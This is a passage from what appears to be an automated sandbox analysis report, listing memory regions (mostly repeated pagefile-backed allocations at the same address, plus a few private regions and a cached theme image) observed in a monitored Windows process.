pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8206 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8207 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8208 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8209 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8210 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8211 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8212 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8213 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8214 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8215 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8216 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8217 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8218 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8219 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8220 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8221 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8222 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8223 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8224 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8225 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8226 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8227 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8228 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8229 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8230 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8231 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8232 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8233 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8234 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8235 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8236 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8237 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8238 start_va = 0x3cf0000 end_va = 0x3d27fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 8239 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 8240 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 8241 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8242 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8243 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8244 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8245 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8246 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8247 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8248 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8249 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8250 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8251 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8252 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8253 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8254 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8255 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8256 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8257 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8258 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8259 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8260 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8261 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8262 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8263 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8264 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 8265 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8266 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8267 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8268 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8269 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 8270 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8271 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8272 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8273 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8274 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8275 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8276 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8277 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8278 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8279 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8280 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8281 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8282 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8283 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8284 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8285 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8286 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8287 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8288 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8289 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8290 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8291 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8292 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 8293 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8294 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8295 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8296 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8297 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8298 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8299 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8300 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8301 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8302 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8303 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8304 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8305 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8306 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8307 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8308 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8309 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8310 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8311 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8312 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8313 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8314 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8315 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8316 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8317 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8318 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8319 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8320 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8321 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8322 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8323 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8324 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8325 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8326 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8327 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8328 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8329 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8330 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8331 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8332 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8333 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8334 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8335 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8336 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8337 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8338 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8339 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8340 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8341 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8342 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 8343 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8344 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8345 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8346 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8347 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8348 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8349 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8350 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8351 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8352 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8353 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8354 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8355 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8356 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8357 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8358 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8359 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8360 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8361 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8362 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8363 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8364 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8365 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8366 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8367 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8368 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8369 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8370 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8371 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8372 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8373 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8374 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8375 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8376 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8377 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8378 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8379 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8380 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8381 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8382 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8383 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 8384 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8385 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8386 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8387 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8388 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 8389 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8390 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8391 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" 